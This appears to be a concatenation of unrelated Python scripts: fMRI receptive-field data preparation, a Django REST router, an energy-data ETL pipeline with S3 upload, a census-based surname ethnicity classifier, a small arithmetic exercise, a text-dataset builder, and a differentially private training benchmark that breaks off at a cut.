    Assumes ``screenshot_paths`` is ordered like ``task_names``.
    """
    dm_list = []
    for i, task_name in enumerate(task_names):
        # create stimulus
        if task_name in screenshot_paths[i]:
            #this is for hcp-format design matrix
            if screenshot_paths[i].endswith('hdf5'):
                with h5py.File(screenshot_paths[i], 'r') as f:
                    dm_task = np.array(f.get('stim')).T
                    # normalize to [0, 1]
                    dm_task /= dm_task.max()
                #assert dm_task.shape[0]%n_pix == 0, f"please choose a n_pix value that is a divisor of {str(dm_task.shape[0])}"
                if dm_task.shape[0]%n_pix != 0:
                    print(f"warning: n_pix is not a divisor of original DM size. The true downsampled size is: {dm_task[::int(dm_task.shape[0]/n_pix),0,0].shape[0]}")
                # strided downsampling to (approximately) n_pix
                dm_list.append(dm_task[::int(dm_task.shape[0]/n_pix),::int(dm_task.shape[0]/n_pix),:])
            #this is for screenshots
            else:
                dm_list.append(create_dm_from_screenshots(screenshot_paths[i],
                                                          n_pix,
                                                          dm_edges_clipping)[..., discard_volumes:])
    task_lengths = [dm.shape[-1] for dm in dm_list]
    dm_full = np.concatenate(tuple(dm_list), axis=-1)
    # late-empty DM periods (for calculation of BOLD baseline)
    shifted_dm = np.zeros_like(dm_full)
    # use timepoints where bar was gone from at least 7 TRs (this is a heuristic approximation)
    shifted_dm[..., 7:] = dm_full[..., :-7]
    late_iso_dict = {}
    late_iso_dict['periods'] = np.where((np.sum(dm_full, axis=(0, 1)) == 0) & (
        np.sum(shifted_dm, axis=(0, 1)) == 0))[0]
    start=0
    for i, task_name in enumerate(task_names):
        stop=start+task_lengths[i]
        if task_name not in screenshot_paths[i]:
            print("WARNING: check that screenshot paths and task names are in the same order")
        # per-task baseline periods, re-indexed to task-local time
        late_iso_dict[task_name] = late_iso_dict['periods'][np.where((late_iso_dict['periods']>=start) & (late_iso_dict['periods']<stop))]-start
        start+=task_lengths[i]
    prf_stim = PRFStimulus2D(screen_size_cm=screen_size_cm,
                             screen_distance_cm=screen_distance_cm,
                             design_matrix=dm_full,
                             TR=TR,
                             task_lengths=task_lengths,
                             task_names=task_names,
                             late_iso_dict=late_iso_dict,
                             normalize_integral_dx=normalize_integral_dx)
    return prf_stim
def prepare_data(subj,
                 prf_stim,
                 test_prf_stim,
                 discard_volumes,
                 min_percent_var,
                 fix_bold_baseline,
                 filter_type,
                 filter_params,
                 data_path,
                 fitting_space,
                 data_scaling,
                 roi_idx,
                 save_raw_timecourse,
                 crossvalidate,
                 fit_runs,
                 fit_task,
                 save_noise_ceiling):
    """Load, filter, scale, baseline-align and mask a subject's timecourses.

    Supports fsaverage/fsnative gifti data (fmriprep layout) and HCP
    cifti data. Per hemisphere and task: runs are filtered, optionally
    z-scored or converted to percent signal change, averaged across the
    selected runs, and shifted so all tasks share the same median baseline
    (taken over the stimulus-free "late iso" periods of ``prf_stim``).
    Vertices with near-flat timecourses (below ``min_percent_var``) are
    masked out, optionally intersected with ``roi_idx``, and the surviving
    timecourses are returned in a randomly permuted order.

    Returns:
        dict with keys 'mask', 'order', 'tc' and, when crossvalidating,
        'tc_test'.
    """
    if fitting_space == 'fsaverage' or fitting_space == 'fsnative':
        hemis = ['L', 'R']
    elif fitting_space == 'HCP':
        # HCP cifti files contain both hemispheres in one file
        hemis = ['LR']
    tc_dict = dd(lambda:dd(dict))
    raw_tcs = False
    for hemi in hemis:
        for task_name in prf_stim.task_names:
            tc_task = []
            if fitting_space == 'fsaverage' or fitting_space == 'fsnative':
                tc_paths = sorted(Path(opj(data_path,'fmriprep',subj)).glob(opj('**',subj+'_ses-*_task-'+task_name+'_run-*_space-'+fitting_space+'_hemi-'+hemi+'*.func.gii')))
            elif fitting_space == 'HCP':
                tc_paths = sorted(Path(opj(data_path,subj)).glob(opj('**',f"tfMRI_RET{task_name}*_7T_*_Atlas_1.6mm_MSMAll_hp2000_clean.dtseries.nii")))
            print("For task "+task_name+", hemisphere "+hemi+" of subject "+subj+", a total of "+str(len(tc_paths))+" runs were found.")
            if fit_runs is not None and (len(fit_runs)>len(tc_paths) or np.any(np.array(fit_runs)>=len(tc_paths))):
                print(f"{fit_runs} fit_runs requested but only {len(tc_paths)} runs were found.")
                raise ValueError
            if fit_runs is None:
                #if CV over tasks, or if no CV, use all runs
                # NOTE(review): this reassignment persists across loop
                # iterations, so later tasks/hemis reuse the run count of
                # the first -- confirm all tasks have equal run counts.
                fit_runs = np.arange(len(tc_paths))
            for tc_path in [tc_paths[run] for run in fit_runs]:
                tc_run = nb.load(str(tc_path))
                if fitting_space == 'fsaverage' or fitting_space == 'fsnative':
                    tc_run_data = np.array([arr.data for arr in tc_run.darrays]).T[...,discard_volumes:]
                elif fitting_space == 'HCP':
                    #cortex only HCP data
                    tc_run_data = np.array(tc_run.get_data()).T[:118584,discard_volumes:]
                #no need to pass further args, only filtering 1 condition
                if data_scaling in ["zsc", "z-score"]:
                    tc_task.append(zscore(filter_predictions(tc_run_data,
                                                             filter_type=filter_type,
                                                             filter_params=filter_params), axis=0))
                elif data_scaling in ["psc", "percent_signal_change"]:
                    tc_task.append(filter_predictions(tc_run_data,
                                                      filter_type=filter_type,
                                                      filter_params=filter_params))
                    tc_task[-1] *= (100/np.mean(tc_task[-1], axis=-1))[...,np.newaxis]
                else:
                    print("Using raw data")
                    raw_tcs = True
                    tc_task.append(filter_predictions(tc_run_data,
                                                      filter_type=filter_type,
                                                      filter_params=filter_params))
                #when scanning sub-001 i mistakenly set the length of the 4F scan to 147, while it should have been 145
                #therefore, there are two extra images at the end to discard in that time series.
                #from sub-002 onwards, this was corrected.
                if subj == 'sub-001' and task_name=='4F':
                    tc_task[-1] = tc_task[-1][...,:-2]
            # average across runs, then estimate baseline over late-iso periods
            tc_dict[hemi][task_name]['timecourse'] = np.mean(tc_task, axis=0)
            tc_dict[hemi][task_name]['baseline'] = np.median(tc_dict[hemi][task_name]['timecourse'][...,prf_stim.late_iso_dict[task_name]],
                                                             axis=-1)
        if crossvalidate:
            # same pipeline for the held-out (test) runs
            for task_name in test_prf_stim.task_names:
                tc_task = []
                if fitting_space == 'fsaverage' or fitting_space == 'fsnative':
                    tc_paths = sorted(Path(opj(data_path,'fmriprep',subj)).glob(opj('**',subj+'_ses-*_task-'+task_name+'_run-*_space-'+fitting_space+'_hemi-'+hemi+'*.func.gii')))
                elif fitting_space == 'HCP':
                    tc_paths = sorted(Path(opj(data_path,subj)).glob(opj('**',f"tfMRI_RET{task_name}*_7T_*_Atlas_1.6mm_MSMAll_hp2000_clean.dtseries.nii")))
                print("For task "+task_name+", hemisphere "+hemi+" of subject "+subj+", a total of "+str(len(tc_paths))+" runs were found.")
                if fit_task is not None:
                    #if CV is over tasks, can use all runs for test data as well
                    cv_runs = np.arange(len(tc_paths))
                else:
                    cv_runs = [run for run in np.arange(len(tc_paths)) if run not in fit_runs]
                for tc_path in [tc_paths[run] for run in cv_runs]:
                    tc_run = nb.load(str(tc_path))
                    #no need to pass further args, only filtering 1 condition
                    if fitting_space == 'fsaverage' or fitting_space == 'fsnative':
                        tc_run_data = np.array([arr.data for arr in tc_run.darrays]).T[...,discard_volumes:]
                    elif fitting_space == 'HCP':
                        #cortex only HCP data
                        tc_run_data = np.array(tc_run.get_data()).T[:118584,discard_volumes:]
                    if data_scaling in ["zsc", "z-score"]:
                        tc_task.append(zscore(filter_predictions(tc_run_data,
                                                                 filter_type=filter_type,
                                                                 filter_params=filter_params), axis=0))
                    elif data_scaling in ["psc", "percent_signal_change"]:
                        tc_task.append(filter_predictions(tc_run_data,
                                                          filter_type=filter_type,
                                                          filter_params=filter_params))
                        tc_task[-1] *= (100/np.mean(tc_task[-1], axis=-1))[...,np.newaxis]
                    else:
                        print("Using raw data")
                        raw_tcs = True
                        tc_task.append(filter_predictions(tc_run_data,
                                                          filter_type=filter_type,
                                                          filter_params=filter_params))
                    #when scanning sub-001 i mistakenly set the length of the 4F scan to 147, while it should have been 145
                    #therefore, there are two extra images at the end to discard in that time series.
                    #from sub-002 onwards, this was corrected.
                    if subj == 'sub-001' and task_name=='4F':
                        tc_task[-1] = tc_task[-1][...,:-2]
                tc_dict[hemi][task_name]['timecourse_test'] = np.mean(tc_task, axis=0)
                tc_dict[hemi][task_name]['baseline_test'] = np.median(tc_dict[hemi][task_name]['timecourse_test'][...,test_prf_stim.late_iso_dict[task_name]],
                                                                      axis=-1)
        #shift timeseries so they have the same average value in proper baseline periods across conditions
        tc_dict[hemi]['median_baseline'] = np.median([tc_dict[hemi][task_name]['baseline'] for task_name in prf_stim.task_names], axis=0)
        for task_name in prf_stim.task_names:
            iso_diff = tc_dict[hemi]['median_baseline'] - tc_dict[hemi][task_name]['baseline']
            tc_dict[hemi][task_name]['timecourse'] += iso_diff[...,np.newaxis]
        tc_dict[hemi]['full_iso']=np.concatenate(tuple([tc_dict[hemi][task_name]['timecourse'] for task_name in prf_stim.task_names]), axis=-1)
        if crossvalidate:
            tc_dict[hemi]['median_baseline_test'] = np.median([tc_dict[hemi][task_name]['baseline_test'] for task_name in test_prf_stim.task_names], axis=0)
            for task_name in test_prf_stim.task_names:
                iso_diff_test = tc_dict[hemi]['median_baseline_test'] - tc_dict[hemi][task_name]['baseline_test']
                tc_dict[hemi][task_name]['timecourse_test'] += iso_diff_test[...,np.newaxis]
            tc_dict[hemi]['full_iso_test']=np.concatenate(tuple([tc_dict[hemi][task_name]['timecourse_test'] for task_name in test_prf_stim.task_names]), axis=-1)
    # stack hemispheres into one (vertices, time) array
    tc_full_iso = np.concatenate(tuple([tc_dict[hemi]['full_iso'] for hemi in hemis]), axis=0)
    iso_full = np.concatenate(tuple([tc_dict[hemi]['median_baseline'] for hemi in hemis]), axis=0)
    tc_mean = tc_full_iso.mean(-1)
    if crossvalidate:
        tc_full_iso_test = np.concatenate(tuple([tc_dict[hemi]['full_iso_test'] for hemi in hemis]), axis=0)
        iso_full_test = np.concatenate(tuple([tc_dict[hemi]['median_baseline_test'] for hemi in hemis]), axis=0)
        tc_mean_test = tc_full_iso_test.mean(-1)
    #masking flat or nearly flat timecourses
    if crossvalidate:
        nonlow_var = (np.abs(tc_full_iso - tc_mean[...,np.newaxis]).max(-1) > (tc_mean*min_percent_var/100)) \
            * (np.abs(tc_full_iso_test - tc_mean_test[...,np.newaxis]).max(-1) > (tc_mean_test*min_percent_var/100)) #\
        #* (tc_mean>0) * (tc_mean_test>0)
    else:
        nonlow_var = (np.abs(tc_full_iso - tc_mean[...,np.newaxis]).max(-1) > (tc_mean*min_percent_var/100)) #\
        #* (tc_mean>0)
    if roi_idx is not None:
        mask = roi_mask(roi_idx, nonlow_var)
    else:
        mask = nonlow_var
    tc_dict_combined = dict()
    tc_dict_combined['mask'] = mask
    tc_full_iso_nonzerovar = tc_full_iso[mask]
    if crossvalidate:
        tc_full_iso_nonzerovar_test = tc_full_iso_test[mask]
    if fix_bold_baseline:
        # re-reference every vertex to its own baseline (baseline -> 0)
        tc_full_iso_nonzerovar -= iso_full[mask][...,np.newaxis]
        if crossvalidate:
            tc_full_iso_nonzerovar_test -= iso_full_test[mask][...,np.newaxis]
    if save_raw_timecourse and raw_tcs == True:
        np.save(opj(data_path.replace('scratch-shared', 'home'),'prfpy',subj+"_timecourse-raw_space-"+fitting_space+".npy"),tc_full_iso[mask])
        np.save(opj(data_path.replace('scratch-shared', 'home'),'prfpy',subj+"_mask-raw_space-"+fitting_space+".npy"),mask)
        if crossvalidate:
            np.save(opj(data_path.replace('scratch-shared', 'home'),'prfpy',subj+"_timecourse-test-raw_space-"+fitting_space+".npy"),tc_full_iso_test[mask])
    if save_noise_ceiling:
        # NOTE(review): requires crossvalidate=True, otherwise
        # tc_full_iso_nonzerovar_test is undefined here.
        noise_ceiling = 1-np.sum((tc_full_iso_nonzerovar_test-tc_full_iso_nonzerovar)**2, axis=-1)/(tc_full_iso_nonzerovar_test.shape[-1]*tc_full_iso_nonzerovar_test.var(-1))
        np.save(opj(data_path,'prfpy',f"{subj}_noise-ceiling_space-{fitting_space}.npy"),noise_ceiling)
    # shuffle vertex order (the permutation is returned so it can be undone)
    order = np.random.permutation(tc_full_iso_nonzerovar.shape[0])
    tc_dict_combined['order'] = order
    tc_dict_combined['tc'] = tc_full_iso_nonzerovar[order]
    if crossvalidate:
        tc_dict_combined['tc_test'] = tc_full_iso_nonzerovar_test[order]
    return tc_dict_combined
|
from rest_framework.routers import DefaultRouter
from posts_areas.api_v1.views import PostAreaViewSet
# Create a router and register our viewsets with it.
# app_name = 'posts_areas'
router = DefaultRouter()
# NOTE(review): `base_name` was renamed to `basename` in DRF 3.9 and removed
# in DRF 3.11 -- confirm the pinned djangorestframework version still
# accepts this keyword.
router.register(r'posts_areas', PostAreaViewSet, base_name="posts_areas-posts_areas")
urlpatterns = router.urls
|
import os
import pandas as pd
from pathlib import Path
import datetime
import logging
import boto3
def traverse_path(path, split_idx):
    """
    Generates a dictionary of the path to each country.
    Input:
        path: str. The path to the root directory
        split_idx: int. split point to capture country name. I.e. -2 splits one directory up.
    """
    country_paths = dict()
    for csv_file in Path(path).glob('**/*.csv'):
        full_path = str(csv_file)
        # the country name is a fixed path component relative to the file
        country = full_path.split('/')[split_idx]
        country_paths.setdefault(country, []).append(full_path)
    return country_paths
def process_capacity_demand(country_paths, output_path, name, new_cols=None):
    """
    Prepares capacity and demand csvs from the ENTOSE API for the data warehouse.
    Appends country information and renames columns.

    Input:
        country_paths: dict. country -> list of csv paths with installed capacity data
        output_path: str. directory to write the processed csvs to
        name: str. file-name prefix for the output csvs (e.g. 'demand', 'capacity')
        new_cols: list. list of new column headers; must match the column
            count after dropping any 'Unnamed: 0' index column
    """
    for country, path_in_strs in country_paths.items():
        for path_in_str in path_in_strs:
            # load dataframe
            df = pd.read_csv(path_in_str)
            # add country name
            df['country_id'] = country
            # rename columns
            if new_cols is not None:
                # drop a stray pandas index column before matching headers
                if 'Unnamed: 0' in df.columns:
                    df.drop('Unnamed: 0', axis=1, inplace=True)
                assert len(new_cols) == len(df.columns), f'new_cols must be length {len(df.columns)}'
                df.columns = new_cols
            #gross quick solution. refactor total_demand into own function.
            # strip '-', ':' and the timezone offset so dates become YYYYMMDD HHMMSS-ish
            if 'event_date' in df.columns:
                df['event_date'] = df['event_date'].str.replace("-", "") \
                    .str.replace(":", "") \
                    .apply(lambda x: x.split("+")[0])
            # save dataframe
            # this datetime year reference also must be refactored.
            df.to_csv(os.path.join(output_path, f'{name}-{country}-{datetime.datetime.now().year}.csv'),
                      index=False, header=False)
            print(f'Saved: {country}')
def process_total_demand(country_paths, output_path):
    """
    Prepares the total demand csvs from the ENTOSE database for the data warehouse.

    Parses the 'time' interval column into a tz-aware Brussels-time index,
    keeps the actual demand (dropping the day-ahead forecast), and writes one
    headerless csv per input file named by country and date range.

    Input:
        country_paths: dict. country -> list of csv paths with total demand data
        output_path: str. path to save
    """
    for country, path_in_strs in country_paths.items():
        for path_in_str in path_in_strs:
            # load dataframe
            df = pd.read_csv(path_in_str)
            # add country name
            df['country_id'] = country
            ## clean column headers (first word, lowercased)
            df.columns = [x[0].strip().lower() for x in df.columns.str.split(" ")]
            df = df.drop('day-ahead', axis=1)
            df.rename(columns={'actual': 'total_demand'}, inplace=True)
            # the 'time' column holds an interval; keep its start timestamp
            df['event_date'] = df['time'].apply(lambda x: pd.to_datetime(x.split("-")[0]))
            df = df.drop('time', axis=1)
            df = df.set_index('event_date')
            df.index = df.index.tz_localize(tz='Europe/Brussels',
                                            ambiguous='infer',
                                            nonexistent='shift_backward')
            # epoch-nanosecond timestamp preserves the timezone information
            df['ts'] = df.index.asi8
            df.index = df.index.strftime("%Y%m%d %H%M%S")
            df.fillna(0, inplace=True)
            # get date ranges
            start = df.index[0].split(" ")[0]
            end = df.index[-1].split(" ")[0]
            # save dataframe
            df = df.reset_index()
            # save dataframe
            df.to_csv(os.path.join(output_path, f'demand-{country}-{start}-{end}.csv'),
                      index=False, header=False)
            print(f'Saved: {country}')
def process_total_generation(country_paths, output_path):
    """
    Prepares the total generation csvs from the ENTOSE database for the data warehouse.

    Parses the 'mtu' interval column into a tz-aware Brussels-time index,
    unpivots the per-technology generation columns into long format, and
    writes one headerless csv per input file named by country and date range.

    Input:
        country_paths: dict. country -> list of csv paths with total generation data
        output_path: str. path to save
    """
    for country, path_in_strs in country_paths.items():
        for path_in_str in path_in_strs:
            # load dataframe
            df = pd.read_csv(path_in_str)
            # add country name
            df['country_id'] = country
            ## clean column headers (first token before '-', lowercased)
            df.columns = [x[0].strip().lower() for x in df.columns.str.split("-")]
            ## parse datetime and set index as dt object
            df['event_date'] = df['mtu'].apply(lambda x: pd.to_datetime(x.split("-")[0]))
            df = df.drop('mtu', axis=1)
            df = df.set_index('event_date')
            df.index = df.index.tz_localize(tz='Europe/Brussels',
                                            ambiguous='infer',
                                            nonexistent='shift_backward')
            ## Add a timestamp column (epoch ns, preserves timezone info)
            df['ts'] = df.index.asi8
            ## format index times for aws YYYY-MM-DD HH:MM:SS
            df.index = df.index.strftime("%Y%m%d %H%M%S")
            # get date ranges
            start = df.index[0].split(" ")[0]
            end = df.index[-1].split(" ")[0]
            ## unpivot data into long format
            df = df.reset_index().melt(id_vars=['event_date', 'ts', 'country_id', 'area'],
                                       var_name='generation_type',
                                       value_name='generation_load')
            ## fill missing values ('n/e' marks not-estimated entries)
            df['generation_load'] = df['generation_load'].replace('n/e', 0).astype('float')
            df['generation_load'].fillna(0, inplace=True)
            # save dataframe
            df.to_csv(os.path.join(output_path, f'generation-{country}-{start}-{end}.csv'),
                      index=False, header=False)
            print(f'Saved: {country}')
def process_day_ahead_prices(country_paths, output_path):
    """
    Prepares the day ahead prices csvs from the ENTOSE database for the data warehouse.

    Parses the 'mtu' interval column into a tz-aware Brussels-time index,
    strips currency/unit suffixes from the price column, and writes one
    headerless csv per input file named by country and date range.

    Input:
        country_paths: dict. country -> list of csv paths with day-ahead price data
        output_path: str. path to save
    """
    for country, path_in_strs in country_paths.items():
        for path_in_str in path_in_strs:
            # load dataframe
            df = pd.read_csv(path_in_str)
            # add country name
            df['country_id'] = country
            ## clean column headers (first word, lowercased)
            df.columns = [x[0].strip().lower() for x in df.columns.str.split(" ")]
            df.rename(columns={'day-ahead': 'day_ahead_price'}, inplace=True)
            # object dtype means the price carries a unit suffix -- keep the number only
            if df['day_ahead_price'].dtype == 'O':
                df['day_ahead_price'] = df['day_ahead_price'].apply(lambda x: str(x).split(" ")[0]).astype('float')
            ## parse datetime and set index as dt object
            df['event_date'] = df['mtu'].apply(lambda x: pd.to_datetime(x.split("-")[0]))
            df = df.drop('mtu', axis=1)
            df = df.set_index('event_date')
            df.index = df.index.tz_localize(tz='Europe/Brussels',
                                            ambiguous='infer',
                                            nonexistent='shift_backward')
            ## Add a timestamp column to keep timezone information
            df['ts'] = df.index.asi8
            ## format index times for aws YYYY-MM-DD HH:MM:SS
            df.index = df.index.strftime("%Y%m%d %H%M%S")
            ## fill missing values
            df.fillna(0, inplace=True)
            # get date ranges
            start = df.index[0].split(" ")[0]
            end = df.index[-1].split(" ")[0]
            # save dataframe
            df = df.reset_index()
            df.to_csv(os.path.join(output_path, f'day-ahead-prices-{country}-{start}-{end}.csv'),
                      index=False, header=False)
            print(f'Saved: {country}')
def upload_data(path, bucketname):
    """Mirror the local directory tree under *path* into the S3 bucket.

    Creates a "directory" key for each leaf folder that does not already
    exist in the bucket, then uploads every file (skipping macOS
    '.DS_Store' artifacts) under 'folder/filename'.

    BUG FIX: the original created a client with explicit AWS_USER/AWS_KEY
    credentials and then ignored it, making all S3 calls through clients
    built from the default credential chain.  All clients now share one
    explicitly-credentialed session.

    Args:
        path: str. local root directory to upload.
        bucketname: str. target S3 bucket name.
    """
    session = boto3.Session(
        aws_access_key_id=os.environ['AWS_USER'],
        aws_secret_access_key=os.environ['AWS_KEY'])
    s3c = session.client('s3')
    s3 = session.resource('s3')
    for root, dirs, files in os.walk(path):
        # 'head' is the last path component, used as the S3 key prefix
        head = ('/').join(root.split('/')[-1:])
        objs = list(s3.Bucket(bucketname).objects.filter(Prefix=head))
        # skip empty head path
        if len(head) == 0:
            continue
        # create the directory placeholder key if it is not already present
        if len(objs) > 0:
            aws_head = ('/').join(objs[0].key.split('/')[:2])
            if aws_head != head:
                s3c.put_object(Bucket=bucketname, Key=(head + '/'))
                print(f'New directory: {head}')
        elif len(objs) == 0:
            s3c.put_object(Bucket=bucketname, Key=(head + '/'))
            print(f'New directory: {head}')
        for file in files:
            if file != '.DS_Store':
                print(f'{head}/{file}')
                s3c.upload_file(os.path.join(root, file), bucketname, f'{head}/{file}')
def process_data():
    """Run the full ETL pass: preprocess every ENTSOE dataset under
    ./data/raw into ./data/processed, then upload the results to S3.
    """
    root_path = './data/raw'
    # template: one subfolder per dataset
    output_path = './data/processed/{}'
    processed_path = './data/processed'
    bucket = 'energy-etl-processed'
    print('Preprocessing total demand')
    logging.info('Preprocessing total demand')
    # country name sits two levels above each csv (split index -2)
    country_paths = traverse_path(os.path.join(root_path, 'total_demand'), -2)
    new_total_demand_cols = ['event_date', 'total_demand', 'ts', 'country_id']
    process_capacity_demand(country_paths,
                            output_path.format('total_demand'),
                            'demand',
                            new_total_demand_cols)
    logging.info('Processing OK: Total demand')
    print('Preprocessing installed capacity')
    logging.info('Preprocessing installed capacity')
    country_paths = traverse_path(os.path.join(root_path, 'installed_capacity'), -2)
    new_install_capacity_cols = ['event_date', 'production_type', 'code',
                                 'name', 'installed_capacity_year_start',
                                 'current_installed_capacity', 'location',
                                 'voltage_connection_level', 'commissioning_date',
                                 'decommissioning_date', 'country_id']
    process_capacity_demand(country_paths,
                            output_path.format('installed_capacity'),
                            'capacity',
                            new_install_capacity_cols)
    logging.info('Processing OK: Installed Capacity')
    print('Preprocessing total generation')
    logging.info('Preprocessing total generation')
    country_paths = traverse_path(os.path.join(root_path, 'total_generation'), -2)
    process_total_generation(country_paths, output_path.format('total_generation'))
    logging.info('Processing OK: Total Generation')
    print('Preprocessing day ahead prices')
    logging.info('Preprocessing day ahead prices')
    country_paths = traverse_path(os.path.join(root_path, 'day_ahead_prices'), -2)
    process_day_ahead_prices(country_paths, output_path.format('day_ahead_prices'))
    logging.info('Processing OK: Day Ahead Prices')
    print(f'Uploading to S3 bucket {bucket}')
    logging.info(f'Uploading to S3 bucket {bucket}')
    upload_data(processed_path, bucket)

if __name__ == '__main__':
    process_data()
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Train a model to classify ethnicity based on census data

Character n-gram (k=3) counts per surname, weighted by the observed
ethnicity percentages, are accumulated over a 90% training split and used
to predict the majority ethnicity for names in the 10% test split.

Created on Thu Apr 13 16:31:53 2017
@author: dhingratul
"""
import numpy as np

my_data = np.genfromtxt('census_2000.csv', delimiter=",", dtype=str)
eth = [0, 1, 2, 3, 4, 5]  # ethnicity class indices (kept for reference)
k = 3  # character n-gram length
dic = {}
# BUG FIX: np.delete returns a new array rather than mutating in place; the
# original discarded the result, so the header row was never removed.
my_data = np.delete(my_data, 0, 0)  # Remove Headers
# Random data split into Train and Test
np.random.shuffle(my_data)
split = round(0.9*len(my_data))
train = my_data[:split, :]
test = my_data[split:, :]
# print(my_data)
names = train[:, 0]
# Accumulate, per n-gram: [count, count*pct_col5, ..., count*pct_col10]
for i in range(len(names)):
    # print(names[i])
    for j in range(len(names[i])-k+1):
        # print(j)
        try:
            ctr = int(train[i, 2])
            if names[i][j:j+k] not in dic:
                dic[names[i][j:j+k]] = [
                    ctr, ctr * float(train[i, 5]),
                    ctr * float(train[i, 6]), ctr * float(train[i, 7]),
                    ctr * float(train[i, 8]), ctr * float(train[i, 9]),
                    ctr * float(train[i, 10])]
            else:
                # print(i,j)
                temp = dic[names[i][j:j+k]]
                dic[names[i][j:j+k]] = [
                    temp[0]+ctr, temp[1] + ctr * float(train[i, 5]),
                    temp[2]+ctr * float(train[i, 6]),
                    temp[3]+ctr * float(train[i, 7]),
                    temp[4]+ctr * float(train[i, 8]),
                    temp[5]+ctr * float(train[i, 9]),
                    temp[6]+ctr * float(train[i, 10])]
        except ValueError:
            # rows with non-numeric counts/percentages are skipped
            # (narrowed from a bare except, which also swallowed
            # KeyboardInterrupt and genuine bugs)
            pass
names_test = test[:, 0]
percent = test[:, 5:]
ctr = 0
ctr2 = 0
for i in range(len(names_test)):
    # print(i)
    te = names_test[i]
    l = []
    try:
        for j in range(len(te)-k+1):
            l.append(dic[te[j:j+k]])
    except KeyError:
        # unseen n-gram: keep whatever n-gram stats were collected so far
        pass
    if not l:
        # no known n-grams for this name: cannot score it
        # print("NA")
        pass
    else:
        ctr += 1
        l = np.array(l)
        # naive-Bayes-style product of the per-n-gram statistics
        l2 = np.prod(l, axis=0)
        try:
            out = np.array(percent[i, :], dtype='|S4')
            # BUG FIX: np.float was removed in NumPy 1.24; use builtin float.
            out = out.astype(float)
        except ValueError:
            # NOTE(review): on failure 'out' keeps the previous row's value
            # (or is undefined on the first row) -- preserved from original.
            pass
        tr_label = np.argmax(out)
        pr_label = np.argmax(l2[1:])
        # print(i,pr_label)
        if pr_label == tr_label:
            ctr2 += 1
print(ctr2/ctr)  # test-set accuracy over scoreable names
|
import math
def gauss(n):
    """Return the n-th triangular number 1 + 2 + ... + n.

    BUG FIX: uses integer floor division instead of `/ 2`, so the result
    is an exact int even for very large n (floats lose precision past 2**53).
    """
    return (n * n + n) // 2


def sumDivisibleBy(x, limit):
    """Return the sum of all positive multiples of x that are <= limit."""
    return x * gauss(limit // x)
# Inclusion-exclusion over multiples strictly below the entered limit.
no1 = int(input('First number: '))
no2 = int(input('Second number: '))
limit = int(input('Limit: ')) - 1
# BUG FIX: the overlap term must use the LEAST COMMON MULTIPLE, not the raw
# product -- e.g. for 4 and 6 the common multiples are multiples of 12, not
# 24, so subtracting multiples of no1*no2 over-counts whenever the two
# numbers share a factor.
common = (no1 * no2) // math.gcd(no1, no2)
result = sumDivisibleBy(no1, limit) + sumDivisibleBy(no2, limit) - sumDivisibleBy(common, limit)
print(result)
|
# -*- coding: utf-8 -*-
import logging
from pathlib import Path
from dotenv import find_dotenv, load_dotenv
import pickle
import tensorflow as tf
from text_generator import Keras_Text_Generator
def main(input_filepath, output_filepath):
    """Build a character-sequence dataset from raw text and pickle it.

    Feeds *input_filepath* through Keras_Text_Generator (sequence length
    300) and writes the resulting dataset object to *output_filepath*.
    """
    logger = logging.getLogger(__name__)
    logger.info('building features...')
    generator = Keras_Text_Generator()
    dataset = generator.load_and_create_dataset(input_filepath, seq_length=300)
    with open(output_filepath, 'wb') as out_file:
        pickle.dump(dataset, out_file)
    logger.info('Features built!')
    return None
if __name__ == '__main__':
    log_fmt = '%(asctime)s - %(name)s - %(levelname)s - %(message)s'
    logging.basicConfig(level=logging.INFO, format=log_fmt)
    # not used in this stub but often useful for finding various files
    # project_dir = Path(__file__).resolve().parents[2]
    # find .env automagically by walking up directories until it's found, then
    # load up the .env entries as environment variables
    # load_dotenv(find_dotenv())
    # NOTE: `snakemake` is injected into the module namespace by Snakemake's
    # `script:` directive -- this file is not runnable standalone.
    main(snakemake.input[0], snakemake.output.rs)
'''
Opacus experiments for all the models
'''
import time
import torch
from torch import nn, optim
import data
from experimental.privacy_utils import autograd_grad_sample
from experimental.privacy_utils.privacy_engine import EfficientPrivacyEngine
from pytorch import get_data, model_dict
import utils
def main(args):
    """Benchmark per-epoch wall-clock time of DP-SGD training using the
    EfficientPrivacyEngine (two-pass backward: per-sample norms first,
    then coefficient-weighted gradients).  Requires CUDA and --dpsgd.
    """
    print(args)
    assert args.dpsgd
    torch.backends.cudnn.benchmark = True
    mdict = model_dict.copy()
    train_data, train_labels = get_data(args)
    model = mdict[args.experiment](vocab_size=args.max_features, batch_size=args.batch_size).cuda()
    optimizer = optim.SGD(model.parameters(), lr=args.learning_rate, momentum=0)
    # Per-sample (unreduced) losses are required so the engine can weight
    # each example individually; logreg uses BCE, everything else CE.
    loss_function = nn.CrossEntropyLoss(reduction="none") if args.experiment != 'logreg' else nn.BCELoss(
        reduction="none")
    privacy_engine = EfficientPrivacyEngine(
        model,
        batch_size=args.batch_size,
        sample_size=len(train_data),
        # Renyi orders the privacy accountant searches over.
        alphas=[1 + x / 10.0 for x in range(1, 100)] + list(range(12, 64)),
        noise_multiplier=args.sigma,
        max_grad_norm=args.max_per_sample_grad_norm,
    )
    privacy_engine.attach(optimizer)
    timings = []
    for epoch in range(1, args.epochs + 1):
        start = time.perf_counter()
        dataloader = data.dataloader(train_data, train_labels, args.batch_size)
        for batch_idx, (x, y) in enumerate(dataloader):
            x, y = x.cuda(non_blocking=True), y.cuda(non_blocking=True)
            outputs = model(x)
            loss = loss_function(outputs, y)
            # Pass 1: hooks record per-sample gradient norms.
            autograd_grad_sample.set_hooks_mode(mode="norm")
            first_loss = loss.mean(dim=0)
            first_loss.backward(retain_graph=True)
            # Pass 2: hooks accumulate gradients scaled by the per-sample
            # clipping coefficients derived from the recorded norms.
            autograd_grad_sample.set_hooks_mode(mode="grad")
            coef_sample = optimizer.privacy_engine.get_coef_sample()
            second_loss = (coef_sample * loss).sum(dim=0)
            second_loss.backward()
            optimizer.step()
            optimizer.zero_grad()
        # Drain queued CUDA kernels so the timing measures real work.
        torch.cuda.synchronize()
        duration = time.perf_counter() - start
        print("Time Taken for Epoch: ", duration)
        timings.append(duration)
        if args.dpsgd:
            epsilon, best_alpha = optimizer.privacy_engine.get_privacy_spent(args.delta)
            print(f"Train Epoch: {epoch} \t"
                  f"(ε = {epsilon}, δ = {args.delta}) for α = {best_alpha}")
        else:
            print(f"Train Epoch: {epoch}")
    if not args.no_save:
        utils.save_runtimes(__file__.split('.')[0], args, timings)
    else:
        print('Not saving!')
    print('Done!')
if __name__ == '__main__':
